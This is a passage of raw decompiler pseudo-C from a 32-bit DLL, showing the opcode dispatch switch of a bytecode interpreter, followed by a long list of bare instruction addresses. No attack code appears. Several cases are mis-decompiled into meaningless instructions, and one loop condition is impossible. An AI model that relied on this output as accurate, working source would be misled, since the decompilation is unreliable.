												__eax = __esi[2];
												__ecx =  *(__edx + 4);
												 *(__esi[2]) = __ecx;
												goto L124;
											case 8:
												L16:
												__edx = __esi[1];
												__eax = __esi[2];
												__ecx =  *(__edx + 4);
												 *__eax = __ecx;
												__edx =  *(__edx + 8);
												 *(__eax + 4) = __edx;
												goto L124;
											case 9:
												L17:
												__eax = __esi[1];
												__edi = 4;
												__eax = __esi[1] + 4;
												__esi[1] = __eax;
												__ecx =  *__eax;
												__eax = __ecx;
												__ecx = __ecx - 1;
												__eflags = __eax;
												 *(__ebp + 8) = __ecx;
												if(__eflags != 0) {
													L18:
													__eax = __ecx + 1;
													do {
														L19:
														__edx = __esi[1];
														__ebx = __esi[2];
														__edx = __esi[1] + 4;
														__esi[1] = __edx;
														__edx =  *__edx;
														 *(__esi[2]) = __edx;
														__ebx = __esi[2];
														__ebx = __esi[2] + 4;
														__eax = __eax - 1;
														__ecx = __ecx - 1;
														__esi[2] = __ebx;
														__eflags = __eax;
													} while (__eflags > 0);
													 *(__ebp + 8) = __ecx;
												}
												goto L124;
											case 0xa:
												L21:
												__ecx = __esi[4];
												__eax = __esi[1];
												__ebx = 0;
												__eax =  *(__esi[1] + 4);
												__edi = 0;
												__eflags = __eax;
												if(__eax >= 0) {
													__eax = __eax;
													__edi =  *(__ecx + 0x24);
													__ebx = 0;
													__eflags = 0;
													__ecx =  *__esi;
													__eax = __eax + __eax * 2;
													__ecx =  *( *__esi);
													__eax = __edi + __eax * 8;
													__edi =  *(__eax + 4);
													__ecx =  *( *__esi) +  *(__eax + 4) * 4;
												} else {
													__ecx =  *(__ecx + 0x1b);
													__edi =  *__esi;
													__eax = __eax + __eax * 2;
													__eax = __ecx + __eax * 8;
													__ecx =  *(__eax + 4);
													__ecx =  *__esi +  *(__eax + 4) * 4;
												}
												__edi =  *__eax;
												__ebx =  *0x1000d240; // 0x2167528
												__eflags = __edx - 0x20;
												__edi =  *(__ebx +  *__eax * 4);
												if(__edx != 0x20) {
													L28:
													__eflags =  *(__eax + 0x10) & 0x00000010;
													if(__eflags != 0) {
														__eflags =  *(__edi + 5) & 0x00010000;
														if(__eflags == 0) {
															__ecx =  *__ecx;
														}
													}
													__edx = __esi[2];
													 *__edx = __ecx;
												} else {
													L25:
													__eflags =  *(__edi + 5) & 0x00010000;
													if(( *(__edi + 5) & 0x00010000) == 0) {
														goto L28;
													} else {
														L26:
														__edx = __esi[2];
														__eax =  *__ecx;
														 *__edx =  *__ecx;
														__eax =  *(__edi + 0x19);
														__eflags =  *(__edi + 0x19) - 1;
														if(__eflags > 0) {
															__eax = __esi[2];
															__eax = __esi[2] + 4;
															__esi[2] = __eax;
															__ecx =  *(__ecx + 4);
															 *__eax = __ecx;
														}
													}
												}
												goto L124;
											case 0xb:
												L32:
												__edi = __esi[1];
												__ecx = 4;
												__edi = __esi[1] + 4;
												__edx = __edi;
												__esi[1] = __edi;
												__edi = __esi[2];
												__eax =  *__edx;
												__edx = __edx + 4;
												__esi[1] = __edx;
												 *(__esi[2]) = __edx;
												__edx = __esi[2];
												__ebx = __eax;
												__edx = __esi[2] + 4;
												 *(__ebp + 8) = __eax;
												__esi[2] = __edx;
												__edi = __edx;
												__edx = __eax;
												__dl = __dl & 0x00000003;
												__dl =  ~__dl;
												asm("sbb edx, edx");
												__edx =  ~__eax;
												__ebx = __eax >> 2;
												__edx =  ~__eax + (__eax >> 2);
												__ebx = __esi[1];
												__edx =  ~__eax + (__eax >> 2) << 2;
												__ebx = __esi[1] + __edx;
												__esi[1] = __ebx;
												 *__edi = __eax;
												__esi[2] = __esi[2] + 4;
												goto L1;
											case 0xc:
												L33:
												__eflags = __ecx;
												if(__eflags != 0) {
													L36:
													__eax = 1;
													 *(__edi - 8) = 1;
												} else {
													L34:
													__eflags = __ebx;
													if(__eflags != 0) {
														goto L36;
													} else {
														L35:
														__eax = 0;
														 *(__edi - 8) = 0;
													}
												}
												goto L124;
											case 0xd:
												L37:
												__eax = 0;
												__eflags = __ecx;
												__eax = 0 | __eflags == 0x00000000;
												 *(__edi - 4) = __eflags == 0;
												goto L124;
											case 0xe:
												L38:
												__eflags = __ecx;
												if(__eflags != 0) {
													L41:
													__eax = 0;
													 *(__edi - 8) = 0;
												} else {
													L39:
													__eflags = __ebx;
													if(__eflags != 0) {
														goto L41;
													} else {
														L40:
														__eax = 1;
														 *(__edi - 8) = 1;
													}
												}
												goto L124;
											case 0xf:
												L42:
												__ecx = __esi[2];
												__edx =  *(__edi - 4);
												 *__ecx = __edx;
												goto L124;
											case 0x10:
												L43:
												__eax = __esi[2];
												__ecx =  *(__edi - 8);
												 *(__esi[2]) = __ecx;
												__edx = __esi[2];
												__eax =  *(__edi - 4);
												 *(__edx + 4) =  *(__edi - 4);
												goto L124;
											case 0x11:
												L44:
												__eax = __esi[2];
												 *(__esi[2]) = __esi[2];
												goto L124;
											case 0x12:
												L45:
												__edx = 0;
												__dl =  *__ecx;
												 *(__edi - 4) = 0;
												goto L124;
											case 0x13:
												L46:
												__eax =  *__ecx;
												 *(__edi - 4) =  *__ecx;
												goto L124;
											case 0x14:
												L47:
												__edx = 0;
												 *(__edi - 4) = 0;
												goto L124;
											case 0x15:
												L48:
												__eax =  *__ecx;
												 *(__edi - 4) =  *__ecx;
												goto L124;
											case 0x16:
												L77:
												__ecx =  *__ecx;
												 *(__edi - 4) = __ecx;
												goto L124;
											case 0x17:
												L49:
												__edx =  *__ecx;
												 *(__edi - 4) = __edx;
												__eax =  *(__ecx + 4);
												 *__edi =  *(__ecx + 4);
												goto L124;
											case 0x18:
												L50:
												 *__ebx = __cl;
												__ecx = __ecx |  *(__ecx + 0xce9f84f);
												__al = __al;
												_t139 = __esi - 0x77;
												 *_t139 =  *(__esi - 0x77) + __ah;
												__eflags =  *_t139;
												goto L124;
											case 0x19:
												L52:
												 *__ebx = __cx;
												 *(__edi - 8) = __ecx;
												goto L124;
											case 0x1a:
												L53:
												 *__ebx = __ecx;
												 *(__edi - 8) = __ecx;
												goto L124;
											case 0x1b:
												L54:
												__edx = __esi[2];
												__eax =  *(__esi[2] - 0xc);
												__edx =  *(__edi - 8);
												 *__eax =  *(__edi - 8);
												__edx =  *(__edi - 4);
												 *(__eax + 4) = __edx;
												__eax = __esi[2];
												 *(__esi[2] - 0xc) = __ebx;
												 *(__edi - 8) = __ecx;
												goto L124;
											case 0x1c:
												L55:
												_t151 = __edi - 8;
												 *_t151 =  *(__edi - 8) + __ecx;
												__eflags =  *_t151;
												__edi = __edi - 1;
												asm("clc");
												goto L124;
											case 0x1d:
												L57:
												_t153 = __edi - 8;
												 *_t153 =  *(__edi - 8) - __ecx;
												__eflags =  *_t153;
												__edi = __edi - 1;
												asm("clc");
												goto L124;
											case 0x1e:
												L59:
												__ecx = __ecx *  *(__edi - 8);
												 *(__edi - 8) = __ecx;
												goto L124;
											case 0x1f:
												L60:
												__eax =  *(__edi - 8);
												__edx = 0;
												_t159 = __eax % __ecx;
												__eax = __eax / __ecx;
												__edx = _t159;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x20:
												L61:
												__eax =  *(__edi - 8);
												__edx = 0;
												_t165 = __eax % __ecx;
												__eax = __eax / __ecx;
												__edx = _t165;
												 *(__edi - 8) = __edx;
												goto L124;
											case 0x21:
												L62:
												_t169 = __edi - 8;
												 *_t169 =  *(__edi - 8) & __ecx;
												__eflags =  *_t169;
												__edi = __edi - 1;
												asm("clc");
												goto L124;
											case 0x22:
												L64:
												_t171 = __edi - 8;
												 *_t171 =  *(__edi - 8) | __ecx;
												__eflags =  *_t171;
												__edi = __edi - 1;
												asm("clc");
												goto L124;
											case 0x23:
												L66:
												_t173 = __edi - 8;
												 *_t173 =  *(__edi - 8) ^ __ecx;
												__eflags =  *_t173;
												__edi = __edi - 1;
												asm("clc");
												goto L124;
											case 0x24:
												L68:
												_t175 = __edi - 8;
												 *_t175 =  *(__edi - 8) << __cl;
												__eflags =  *_t175;
												asm("a16 clc");
												goto L124;
											case 0x25:
												L70:
												_t177 = __edi - 8;
												 *_t177 =  *(__edi - 8) >> __cl;
												__eflags =  *_t177;
												asm("outsd");
												asm("clc");
												goto L124;
											case 0x26:
												L72:
												__eflags = __ebx - __ecx;
												asm("sbb ecx, ecx");
												__ecx =  ~__ecx;
												 *(__edi - 8) = __ecx;
												goto L124;
											case 0x27:
												L73:
												__eflags = __ecx - __ebx;
												asm("sbb edx, edx");
												__edx =  ~__edx;
												 *(__edi - 8) = __edx;
												goto L124;
											case 0x28:
												L74:
												__eax = 0;
												__eflags = __ecx - __ebx;
												__eax = 0 | __eflags == 0x00000000;
												 *(__edi - 8) = __eflags == 0;
												goto L124;
											case 0x29:
												L75:
												__ecx =  !__ecx;
												 *(__edi - 4) = __ecx;
												goto L124;
											case 0x2a:
												L76:
												 *__ecx =  *__ecx + 1;
												__eflags =  *__ecx;
												goto L77;
											case 0x2b:
												L78:
												__edx =  *__ecx;
												 *(__edi - 4) = __edx;
												 *__ecx =  *__ecx + 1;
												 *__ecx =  *__ecx + 1;
												goto L124;
											case 0x2c:
												L79:
												__eax =  *__ecx;
												__eax =  *__ecx - 1;
												 *__ecx = __eax;
												__ecx = __eax;
												 *(__edi - 4) = __ecx;
												goto L124;
											case 0x2d:
												L80:
												__eax =  *__ecx;
												 *(__edi - 4) =  *__ecx;
												 *__ecx =  *__ecx - 1;
												 *__ecx =  *__ecx - 1;
												goto L124;
											case 0x2e:
												L81:
												__eax =  *__ebx;
												__eax =  *__ebx + __ecx;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x2f:
												L82:
												__eax =  *__ebx;
												__eax =  *__ebx - __ecx;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x30:
												L83:
												__edx =  *__ebx;
												__edx =  *__ebx * __ecx;
												__eax = __edx;
												 *__ebx = __edx;
												 *(__edi - 8) = __edx;
												goto L124;
											case 0x31:
												L84:
												__eax =  *__ebx;
												__edx = 0;
												_t193 = __eax % __ecx;
												__eax = __eax / __ecx;
												__edx = _t193;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x32:
												L85:
												__eax =  *__ebx;
												__edx = 0;
												_t198 = __eax % __ecx;
												__eax = __eax / __ecx;
												__edx = _t198;
												__eax = __edx;
												 *__ebx = __edx;
												 *(__edi - 8) = __edx;
												goto L124;
											case 0x33:
												L86:
												__eax =  *__ebx;
												__eax =  *__ebx & __ecx;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x34:
												L87:
												__eax =  *__ebx;
												__eax =  *__ebx | __ecx;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x35:
												L88:
												__eax =  *__ebx;
												__eax =  *__ebx ^ __ecx;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x36:
												L89:
												__eax =  *__ebx;
												__eax =  *__ebx << __cl;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x37:
												L90:
												__eax =  *__ebx;
												__eax =  *__ebx >> __cl;
												 *__ebx = __eax;
												 *(__edi - 8) = __eax;
												goto L124;
											case 0x38:
												L91:
												__ecx = __esi[1];
												__edx =  *(__esi[1] + 4);
												__eax = E10004650(__eflags, __fp0, __esi,  *(__esi[1] + 4));
												goto L124;
											case 0x39:
												L92:
												__eax = __esi[4];
												__ecx =  *(__esi[4] + 5);
												__eflags = __ch & 0x00000008;
												if(__eflags == 0) {
													__edx = __esi[2];
													__eax = 0;
													 *__edx = 0;
												} else {
													__ecx =  *__esi;
													__edx = __esi[2];
													__eax =  *(__ecx - 4);
													 *__edx =  *(__ecx - 4);
												}
												goto L124;
											case 0x3a:
												L95:
												__eax = __esi[4];
												__edx =  *(__esi[4] + 5);
												__eflags = __dh & 0x00000008;
												if(__eflags == 0) {
													L98:
													__eax = E10004E80(__ecx);
												} else {
													L96:
													__edx =  *__esi;
													__eax =  *(__edx - 4);
													__eflags =  *(__edx - 4);
													if(__eflags == 0) {
														goto L98;
													} else {
														L97:
														__eax = E10004A40(__eax, __ecx);
													}
												}
												goto L124;
											case 0x3b:
												L99:
												__eax = __esi[1];
												__edx =  *0x1000d240; // 0x2167528
												__ecx =  *(__esi[1] + 4);
												__eax =  *(__edx +  *(__esi[1] + 4) * 4);
												__ecx = __esi[2];
												__edx =  *( *(__edx +  *(__esi[1] + 4) * 4) + 0x19);
												 *__ecx = __edx;
												goto L124;
											case 0x3c:
												L100:
												__eax = __esi[1];
												__ecx = __esi[2];
												__eax = __esi[1] + 8;
												 *(__esi[2]) = __esi[1] + 8;
												__ebx = __esi[2];
												__edx = __esi[5];
												__eax = 4;
												__ebx = __esi[2] + 4;
												__ecx = __ebx;
												__esi[2] = __ebx;
												 *__ebx = __esi[5];
												__edi = __esi[2];
												__edi = __esi[2] + 4;
												__ecx = __edi;
												__esi[2] = __edi;
												 *__edi = 0;
												__edx = __esi[2];
												__edx = __esi[2] + 4;
												__ecx = __edx;
												__esi[2] = __edx;
												 *__edx = 0;
												__ecx = __esi[2];
												__ecx = __esi[2] + 4;
												__eax = __ecx;
												__esi[2] = __ecx;
												__esi[5] = __ecx;
												L11:
												__eax = __esi[1];
												__edx = __esi[4];
												__ecx =  *(__esi[1] + 4);
												__eax =  *(__edx + 0x20);
												__ecx =  *(__edx + 0x20) +  *(__esi[1] + 4) * 4;
												__esi[1] = __ecx;
												goto L1;
											case 0x3d:
												L101:
												__edx = __esi[1];
												__eax = __esi[5];
												__ecx =  *(__edx + 4);
												 *(__esi[5] - 8) = __ecx;
												goto L124;
											case 0x3e:
												L102:
												__edx = __esi[1];
												__ecx = __esi[4];
												__eax =  *(__esi[1] + 4);
												__edx =  *(__ecx + 0x2e);
												__eax =  *(__esi[1] + 4) +  *(__esi[1] + 4) * 2;
												__edi =  *(__ecx + 0x2e) + ( *(__esi[1] + 4) +  *(__esi[1] + 4) * 2) * 4;
												__edx = __esi[5];
												 *(__edi + 4) = 0x10 +  *(__edi + 4) * 4;
												__edx = __esi[5] - 0x10 +  *(__edi + 4) * 4;
												__eax = 0;
												__ax =  *((intOrPtr*)(__edi + 2));
												__edx =  *(__ecx + 0x24);
												__eax = 0;
												__eax =  *( *(__ecx + 0x24) + 4);
												__edx = 0;
												__dl =  *((intOrPtr*)(__ecx + 0x1f));
												__ecx =  *__esi;
												__edx =  *( *__esi);
												__eax = E10003FD0(__eax,  *( *__esi), __eax);
												__ecx = __esi[5];
												__edx =  *(__edi + 4);
												 *(__ecx - 4) = __edx;
												goto L124;
											case 0x3f:
												L103:
												__edi = __esi[5];
												__edi = __esi[5] - 0x10;
												__eax =  *__edi;
												__esi[1] =  *__edi;
												__ecx =  *(__edi + 4);
												__esi[5] = __ecx;
												__ebx =  *(__edi + 8);
												__eflags = __ebx;
												if(__eflags != 0) {
													__eax = __esi[2];
													__ecx =  *(__edi + 0xc);
													__edx = __ebx * 4;
													__eax = __esi[2] - __ebx * 4;
													__edx = __edi;
													__ecx =  *(__edi + 0xc) << 2;
													__edx = __edi - ( *(__edi + 0xc) << 2);
													__eflags = __edi - ( *(__edi + 0xc) << 2);
													__eax = E10003FD0(__edi - ( *(__edi + 0xc) << 2), __esi[2] - __ebx * 4, __ebx);
												}
												__ebx = __ebx -  *(__edi + 0xc);
												__eax = __edi + __ebx * 4;
												__esi[2] = __edi + __ebx * 4;
												goto L1;
											case 0x40:
												L6:
												_t427 =  &(( *(_t458 + 4))[1]);
												 *(_t458 + 4) = _t427;
												_t429 =  *(_t458 + 8) - 4 +  *_t427 * 4;
												_t436 =  *_t429;
												_t439 =  &(_t429[1]);
												 *(_t460 + 0xc) = _t436;
												E10003FD0(_t429,  &(_t429[1]),  *_t427);
												 *(_t458 + 8) =  *(_t458 + 8) + 0xfffffffc;
												goto L2;
											case 0x41:
												L106:
												__ecx = __esi[1];
												__edi = __esi[2];
												__ecx = __esi[1] + 4;
												__eax = __ecx;
												__esi[1] = __ecx;
												__ecx =  *__eax;
												__eax = __eax + 4;
												__esi[1] = __eax;
												 *(__ebp - 8) = __ecx;
												__ebx =  *__eax;
												__eflags = __ebx;
												if(__ebx > 0) {
													L107:
													__eax = __ebx;
													do {
														L108:
														__edx =  *(__edi - 4);
														__edi = __edi - 4;
														 *(__ebp + 8) = __edx;
														_push( *(__ebp + 8));
														__eax = __eax - 1;
														__eflags = __eax;
													} while (__eax != 0);
												}
												L109:
												__eax =  *(__edi - 4);
												__edi = __edi - 4;
												 *(__ebp + 0xc) = __eax;
												 *(__ebp + 8) =  *(__ebp + 0xc)();
												 *(__ebp - 4) = __edx;
												__eax =  *(__ebp - 8);
												__eflags =  *(__ebp - 8);
												if(__eflags != 0) {
													__ecx = __ebx * 4;
													 *(__ebp + 0xc) = __ecx;
													__esp = __esp +  *(__ebp + 0xc);
													__eflags = __esp;
												}
												__edx =  *(__ebp + 8);
												 *__edi = __edx;
												__eax = __esi[1];
												__edi = __edi + 4;
												__eax = __esi[1] + 4;
												__esi[2] = __edi;
												__esi[1] = __esi[1] + 4;
												goto L1;
											case 0x42:
												L112:
												__eflags = __esi -  *((intOrPtr*)(__ebp - 0xc));
												if(__esi ==  *((intOrPtr*)(__ebp - 0xc))) {
													L151:
													__ecx =  *(__ebp + 0x10);
													__eflags = __ecx;
													if(__ecx != 0) {
														__eax =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) * 4;
														__esi[2] = __esi[2] -  *(__ebp - 0x10) * 4;
														__eflags = __esi[2] -  *(__ebp - 0x10) * 4;
														__eax = E10003FD0(__ecx, __esi[2] -  *(__ebp - 0x10) * 4, __esi[2] -  *(__ebp - 0x10) * 4);
													}
													L153:
													__ecx =  *(__ebp - 0x14);
													__eax = E10003B40( *(__ebp - 0x14));
													_pop(__edi);
													_pop(__esi);
													__eax = 1;
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return 1;
												} else {
													L113:
													__eax =  *0x1000d350; // 0x0
													__eflags = __eax;
													if(__eax != 0) {
														_push(__esi);
														__eax =  *__eax();
													}
													__ebx = __esi[4];
													__ax =  *((intOrPtr*)(__ebx + 0x2c));
													__eflags = __ax;
													if(__ax != 0) {
														L116:
														__edi = 0;
														__eflags = __ax;
														if(__ax > 0) {
															do {
																L117:
																E100045F0(__esi, __edi) = 0;
																__edi = __edi + 1;
																__ax =  *((intOrPtr*)(__ebx + 0x2c));
																__eflags = __edi;
															} while (__edi < 0);
														}
														L118:
														__eflags =  *((intOrPtr*)(__ebx + 0x28)) - 0x400;
														if( *((intOrPtr*)(__ebx + 0x28)) > 0x400) {
															__ecx = __esi[4];
															__eax =  *__esi;
															__edx = 0;
															__eflags = 0;
															__dl =  *((intOrPtr*)(__esi[4] + 0x1f));
															__ecx =  *( *__esi);
															__eax = E10003B40( *( *__esi));
														}
													}
													L120:
													__eax = __esi[3];
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __esi[9];
														__edx = __eax * 4;
														__esi[2] = __esi[2] - __edx;
														__eax = E10003FD0(__esi[9], __esi[2] - __edx, __esi[2] - __edx);
														__edx = __esi[3];
														__eax = __esi[9];
														__edx = __esi[3] << 2;
														__eax = __esi[9] + __edx;
														__eflags = __eax;
														__esi[9] = __eax;
													}
													__esi =  &(__esi[7]);
													goto L124;
												}
												goto L154;
										}
									}
									L154:
								case 1:
									L123:
									_push(__esi);
									__eax =  *(__edi + 0x20)();
									L124:
									_t423 =  *(_t460 - 8);
									_t439 =  *(_t423 + 0x24) << 2;
									 *(_t458 + 8) =  *(_t458 + 8) + ( *(_t423 + 0x24) << 2);
									 *(_t458 + 4) =  &(( *(_t458 + 4))[ *(_t423 + 0x28)]);
									goto L1;
								case 2:
									L125:
									__esi[2] = __esi[2] + 0x200;
									__eflags = __esi[2] + 0x200 - __esi;
									if(__eflags > 0) {
										__ecx =  *(__ebp + 0x14);
										_push(__ecx);
										_push(0x502000a);
										__eax = E100040A0(__ebx, __ecx, __edi, __esi, __eflags);
										__esp = __esp + 8;
									}
									__ecx = __esi[2];
									__edx = 0;
									__dl =  *((intOrPtr*)(__edi + 0x1f));
									__esi = __esi - 0x1c;
									 ~0x00000000 =  ~0x00000000 << 2;
									__ecx = __ecx + ( ~0x00000000 << 2);
									__edx = 0;
									__esi[9] = __ecx;
									__eax =  *(__edi + 0x20);
									__esi[1] =  *(__edi + 0x20);
									__eax = __esi[9];
									__ecx = 0;
									 *__esi = __eax;
									__cl =  *((intOrPtr*)(__edi + 0x1f));
									__ecx = 0;
									__ecx = __eax + 4;
									__esi[2] = 0;
									__edx =  *(__edi + 0x28);
									__eflags = __edx - 0x400;
									if(__edx <= 0x400) {
										__edx = 0;
										__dl =  *((intOrPtr*)(__edi + 0x1f));
										 *__eax = __ecx;
										__eax =  *(__edi + 0x28);
										__ecx = __esi[2];
										__eax =  *(__edi + 0x28) << 2;
										__ecx = __esi[2] + __eax;
										__eflags = __ecx;
										__esi[2] = __ecx;
									} else {
										__eax = __edx * 4;
										_push(__edx * 4);
										__eax = E10003980();
										__edx =  *__esi;
										__ecx = 0;
										__cl =  *((intOrPtr*)(__edi + 0x1f));
										 *( *__esi) = __eax;
									}
									__ecx = __esi[2];
									__edx = 0;
									__esi[5] = __ecx;
									__dl =  *(__edi + 0x19);
									__esi[3] = 0;
									__esi[4] = __edi;
									__ax =  *(__edi + 0x2c);
									__eflags =  *(__edi + 0x2c);
									if( *(__edi + 0x2c) != 0) {
										__ecx =  *__esi;
										__eax = 0;
										__eflags = 0;
										__al =  *((intOrPtr*)(__edi + 0x1f));
										__edx =  *__esi + 4;
										__eax = E10003FB0(__edx, 0);
									}
									__eax = __esi[1];
									__eflags = __esi[1];
									if(__eflags == 0) {
										 *(__edi + 9) = E100040A0(__ebx, __ecx, __edi, __esi, __eflags, 0x302000c,  *(__edi + 9), __ebx);
									}
									goto L1;
								case 3:
									goto L0;
								case 4:
									L149:
									__ecx = __esi[2];
									 *__ecx = __ebx;
									__esi[2] = __esi[2] + 4;
									__esi[2] = __esi[2] + 4;
									__esi[1] = __esi[1] + 4;
									__esi[1] = __esi[1] + 4;
									goto L1;
							}
						}
						break;
					}
					L150:
					_push(_t436);
					_push(0x502000d);
					E100040A0(_t436, _t439, _t456, _t458, 0xffffffffffffffff - 4);
					return 0;
				}
			}















                                                                    0x10002a73
                                                                    0x10002a73
                                                                    0x10002a73
                                                                    0x10002a73
                                                                    0x10002a73
                                                                    0x10002a73
                                                                    0x10002a73
                                                                    0x10002a78
                                                                    0x10002a7b
                                                                    0x10002a7d
                                                                    0x10002a87
                                                                    0x10002a8c
                                                                    0x10002a8f
                                                                    0x10002a92
                                                                    0x10002a95
                                                                    0x10002a97
                                                                    0x10002a99
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002a9b
                                                                    0x10002a9b
                                                                    0x10002a9b
                                                                    0x10002a9e
                                                                    0x10002aa1
                                                                    0x10002aa4
                                                                    0x10002aa9
                                                                    0x10002aaa
                                                                    0x10002aad
                                                                    0x10002aad
                                                                    0x10002ab1
                                                                    0x10002ab1
                                                                    0x10002ab8
                                                                    0x10002adf
                                                                    0x10002ae2
                                                                    0x10002aba
                                                                    0x10002aba
                                                                    0x10002abe
                                                                    0x10002ac8
                                                                    0x10002acb
                                                                    0x10002ad4
                                                                    0x10002ad7
                                                                    0x10002ac0
                                                                    0x10002ac0
                                                                    0x10002ac3
                                                                    0x10002ac3
                                                                    0x10002abe
                                                                    0x10002ae5
                                                                    0x10002aec
                                                                    0x10002af3
                                                                    0x10002af6
                                                                    0x10002af9
                                                                    0x10002af9
                                                                    0x10002af9
                                                                    0x10002aff
                                                                    0x10002b01
                                                                    0x10002b06
                                                                    0x10002b08
                                                                    0x10002b08
                                                                    0x10002b08
                                                                    0x10002b0b
                                                                    0x10002b0f
                                                                    0x10002b14
                                                                    0x10002b16
                                                                    0x10002b16
                                                                    0x10002b16
                                                                    0x10002b19
                                                                    0x10002b19
                                                                    0x10002b22
                                                                    0x10002278
                                                                    0x10002278
                                                                    0x1000227b
                                                                    0x10002280
                                                                    0x10002284
                                                                    0x10002287
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000228d
                                                                    0x1000228d
                                                                    0x1000228d
                                                                    0x10002292
                                                                    0x10002297
                                                                    0x100022a1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100022a7
                                                                    0x100022a7
                                                                    0x00000000
                                                                    0x100022ae
                                                                    0x100022b1
                                                                    0x100022ba
                                                                    0x100022c0
                                                                    0x00000000
                                                                    0x100022c6
                                                                    0x100022c6
                                                                    0x100022c6
                                                                    0x00000000
                                                                    0x100022fa
                                                                    0x100022fa
                                                                    0x100022fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002300
                                                                    0x10002300
                                                                    0x10002303
                                                                    0x10002306
                                                                    0x10002309
                                                                    0x1000230c
                                                                    0x10002310
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002318
                                                                    0x10002318
                                                                    0x1000231b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000231e
                                                                    0x1000231e
                                                                    0x10002320
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000233d
                                                                    0x1000233d
                                                                    0x10002340
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002343
                                                                    0x10002343
                                                                    0x10002345
                                                                    0x00000000
                                                                    0x1000234b
                                                                    0x1000234b
                                                                    0x00000000
                                                                    0x1000234b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000234d
                                                                    0x1000234d
                                                                    0x10002350
                                                                    0x10002353
                                                                    0x10002356
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000235d
                                                                    0x1000235d
                                                                    0x10002360
                                                                    0x10002363
                                                                    0x10002366
                                                                    0x10002368
                                                                    0x1000236b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002373
                                                                    0x10002373
                                                                    0x10002376
                                                                    0x1000237b
                                                                    0x1000237d
                                                                    0x10002380
                                                                    0x10002382
                                                                    0x10002384
                                                                    0x10002385
                                                                    0x10002387
                                                                    0x1000238a
                                                                    0x10002390
                                                                    0x10002390
                                                                    0x10002393
                                                                    0x10002393
                                                                    0x10002393
                                                                    0x10002396
                                                                    0x10002399
                                                                    0x1000239b
                                                                    0x1000239e
                                                                    0x100023a0
                                                                    0x100023a2
                                                                    0x100023a5
                                                                    0x100023a7
                                                                    0x100023a8
                                                                    0x100023a9
                                                                    0x100023ac
                                                                    0x100023ac
                                                                    0x100023b0
                                                                    0x100023b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100023b8
                                                                    0x100023b8
                                                                    0x100023bb
                                                                    0x100023be
                                                                    0x100023c3
                                                                    0x100023c6
                                                                    0x100023c8
                                                                    0x100023ca
                                                                    0x100023df
                                                                    0x100023e1
                                                                    0x100023e4
                                                                    0x100023e4
                                                                    0x100023e9
                                                                    0x100023eb
                                                                    0x100023ee
                                                                    0x100023f1
                                                                    0x100023f4
                                                                    0x100023f7
                                                                    0x100023cc
                                                                    0x100023cc
                                                                    0x100023cf
                                                                    0x100023d1
                                                                    0x100023d4
                                                                    0x100023d7
                                                                    0x100023da
                                                                    0x100023da
                                                                    0x100023fa
                                                                    0x100023fc
                                                                    0x10002402
                                                                    0x10002405
                                                                    0x10002408
                                                                    0x10002439
                                                                    0x10002439
                                                                    0x1000243d
                                                                    0x1000243f
                                                                    0x10002446
                                                                    0x10002448
                                                                    0x10002448
                                                                    0x10002446
                                                                    0x1000244a
                                                                    0x1000244d
                                                                    0x1000240a
                                                                    0x1000240a
                                                                    0x1000240a
                                                                    0x10002411
                                                                    0x00000000
                                                                    0x10002413
                                                                    0x10002413
                                                                    0x10002413
                                                                    0x10002416
                                                                    0x10002418
                                                                    0x1000241a
                                                                    0x1000241d
                                                                    0x10002420
                                                                    0x10002426
                                                                    0x10002429
                                                                    0x1000242c
                                                                    0x1000242f
                                                                    0x10002432
                                                                    0x10002432
                                                                    0x10002420
                                                                    0x10002411
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002454
                                                                    0x10002454
                                                                    0x10002457
                                                                    0x1000245c
                                                                    0x1000245e
                                                                    0x10002460
                                                                    0x10002463
                                                                    0x10002466
                                                                    0x10002468
                                                                    0x1000246a
                                                                    0x1000246d
                                                                    0x1000246f
                                                                    0x10002472
                                                                    0x10002474
                                                                    0x10002476
                                                                    0x10002479
                                                                    0x1000247c
                                                                    0x1000247e
                                                                    0x10002480
                                                                    0x10002483
                                                                    0x10002485
                                                                    0x10002487
                                                                    0x10002489
                                                                    0x1000248c
                                                                    0x1000248e
                                                                    0x10002491
                                                                    0x10002494
                                                                    0x10002496
                                                                    0x10002499
                                                                    0x1000249b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100024a3
                                                                    0x100024a3
                                                                    0x100024a5
                                                                    0x100024b5
                                                                    0x100024b5
                                                                    0x100024ba
                                                                    0x100024a7
                                                                    0x100024a7
                                                                    0x100024a7
                                                                    0x100024a9
                                                                    0x00000000
                                                                    0x100024ab
                                                                    0x100024ab
                                                                    0x100024ab
                                                                    0x100024ad
                                                                    0x100024ad
                                                                    0x100024a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100024c2
                                                                    0x100024c2
                                                                    0x100024c4
                                                                    0x100024c6
                                                                    0x100024c9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100024d1
                                                                    0x100024d1
                                                                    0x100024d3
                                                                    0x100024e6
                                                                    0x100024e6
